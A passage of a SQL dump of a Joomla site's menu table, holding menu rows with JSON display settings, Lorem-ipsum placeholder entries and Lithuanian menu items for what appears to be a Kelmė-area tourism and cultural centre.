00:00:00',0,1,'',0,'{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',234,235,0,'*',0),(220,'mainmenu','Events','event','','event','index.php?option=com_k2&view=itemlist&layout=category&task=category&id=3','component',-2,1,1,10048,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"categories\":[\"3\"],\"singleCatOrdering\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',237,238,0,'*',0),(221,'mainmenu','Courses','course','','course','index.php?option=com_content&view=category&id=19','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_heading_title_text\":\"\",\"show_category_title\":\"1\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"0\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"0\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"0\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"0\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',239,240,0,'*',0),(224,'mainmenu','sed diam non','2013-10-02-07-13-20','','home/2013-09-24-08-36-52/2013-10-02-07-13-20','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',19,20,0,'*',0),(225,'mainmenu','nibh euismod','2013-10-02-07-45-03','','home/2013-09-24-08-36-52/2013-10-02-07-45-03','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',21,22,0,'*',0),(226,'mainmenu','tincidunt ut lao','2013-10-02-07-55-42','','home/2013-09-24-08-36-52/2013-10-02-07-55-42','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',23,24,0,'*',0),(227,'mainmenu','eet dolore magna ','2013-10-02-07-56-15','','home/2013-09-24-08-36-52/2013-10-02-07-56-15','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',25,26,0,'*',0),(228,'mainmenu','liquam erat volutpat','2013-10-02-07-57-02','','home/2013-09-24-08-36-52/2013-10-02-07-57-02','#','url',-2,208,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',27,28,0,'*',0),(229,'mainmenu','Ut wisi enim','2013-10-02-08-06-23','','home/2013-09-24-08-40-33/2013-10-02-08-06-23','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',35,36,0,'*',0),(230,'mainmenu','ad minim veniam','2013-10-02-08-06-43','','home/2013-09-24-08-40-33/2013-10-02-08-06-43','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',37,38,0,'*',0),(231,'mainmenu','quis nostrud','2013-10-02-08-07-10','','home/2013-09-24-08-40-33/2013-10-02-08-07-10','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',43,44,0,'*',0),(232,'mainmenu','exerci tation ull','2013-10-02-08-07-28','','home/2013-09-24-08-40-33/2013-10-02-08-07-28','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',41,42,0,'*',0),(233,'mainmenu','mcor susci lob','2013-10-02-08-07-51','','home/2013-09-24-08-40-33/2013-10-02-08-07-51','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',45,46,0,'*',0),(234,'mainmenu','nisl ut aliqu','2013-10-02-08-08-24','','home/2013-09-24-08-40-33/2013-10-02-08-08-24','#','url',-2,211,3,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',39,40,0,'*',0),(236,'mainmenu','Contact from','contact-from','','pages/contact-from','index.php?option=com_contact&view=contact&id=2','component',-2,215,2,8,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"presentation_style\":\"plain\",\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"show_name\":\"0\",\"show_position\":\"0\",\"show_email\":\"0\",\"show_street_address\":\"0\",\"show_suburb\":\"0\",\"show_state\":\"0\",\"show_postcode\":\"0\",\"show_country\":\"0\",\"show_telephone\":\"0\",\"show_mobile\":\"0\",\"show_fax\":\"0\",\"show_webpage\":\"0\",\"show_misc\":\"0\",\"show_image\":\"0\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_links\":\"0\",\"linka_name\":\"Facebook\",\"linkb_name\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkc_name\":\"twitter\",\"linkd_name\":\"http:\\/\\/twitter.com\\/joomla\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',232,233,0,'*',0),(237,'mainmenu','Preset4','2013-10-07-12-17-27','','2013-01-31-07-20-51/2013-10-07-12-17-27','?preset=preset4','url',-2,117,2,0,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',220,221,0,'*',0),(256,'main','com_j2xml','com-j2xml','','com-j2xml','index.php?option=com_j2xml','component',0,1,1,10072,0,0,'0000-00-00 00:00:00',0,1,'class:j2xml',0,'',327,332,0,'',1),(257,'main','com_j2xml_menu_cpanel','com-j2xml-menu-cpanel','','com-j2xml/com-j2xml-menu-cpanel','index.php?option=com_j2xml&view=cpanel','component',0,256,2,10072,0,0,'0000-00-00 00:00:00',0,1,'class:cpanel',0,'',328,329,0,'',1),(258,'main','com_j2xml_menu_websites','com-j2xml-menu-websites','','com-j2xml/com-j2xml-menu-websites','index.php?option=com_j2xml&view=websites','component',0,256,2,10072,0,0,'0000-00-00 00:00:00',0,1,'class:websites',0,'',330,331,0,'',1),(320,'mainmenu','Video apie Kelmės kraštą','video-apie-kelmes-krasta','','turizmo-informacija/video-apie-kelmes-krasta','index.php?option=com_content&view=article&id=309','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',104,105,0,'*',0),(300,'mainmenu','Kaimo turizmas','kaimo-turizmas','','apgyvendinimas/kaimo-turizmas','index.php?option=com_content&view=article&id=194','component',-2,289,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',122,123,0,'*',0),(259,'mainmenu','Apie centrą','apie-centra','','apie-centra','index.php?option=com_content&view=article&id=93','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',51,82,0,'*',0),(260,'mainmenu','Veikla','veikla','','veikla','index.php?option=com_content&view=category&id=53','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_category_heading_title_text\":\"\",\"show_category_title\":\"1\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"0\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"0\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"0\",\"show_pagination_results\":\"0\",\"display_num\":\"0\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',257,272,0,'*',0),(261,'mainmenu','Paslaugos','paslaugos','','veikla/paslaugos','index.php?option=com_content&view=article&id=178','component',-2,260,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',258,259,0,'*',0),(262,'mainmenu','Ekskursijos','ekskursijos','','veikla/ekskursijos','index.php?option=com_content&view=article&id=179','component',-2,260,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',260,261,0,'*',0),(263,'mainmenu','Edukacinės programos','edukacines-programos','','veikla/edukacines-programos','index.php?option=com_content&view=article&id=183','component',-2,260,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',262,263,0,'*',0),(264,'mainmenu','Suvenyrai','suvenyrai','','veikla/suvenyrai','index.php?option=com_content&view=article&id=180','component',-2,260,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',264,265,0,'*',0),(265,'mainmenu',' Įstatai','istatai','','veikla/istatai','index.php?option=com_content&view=article&id=176','component',-2,260,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',266,267,0,'*',0),(266,'mainmenu','Darbo užmokestis','darbo-uzmokestis','','veikla/darbo-uzmokestis','index.php?option=com_content&view=article&id=177','component',-2,260,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',268,269,0,'*',0),(267,'mainmenu','Veiklos strategija','veiklos-strategija','','veikla/veiklos-strategija','index.php?option=com_content&view=article&id=182','component',-2,260,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',270,271,0,'*',0),(268,'mainmenu','Viešieji pirkimai','viesieji-pirkimai','','viesieji-pirkimai','index.php?option=com_content&view=article&id=95','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',243,250,0,'*',0),(269,'mainmenu','Pirkimų planas','pirkimu-planas','','viesieji-pirkimai/pirkimu-planas','index.php?option=com_content&view=article&id=95','component',-2,268,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',244,245,0,'*',0),(270,'mainmenu','Paskelbti 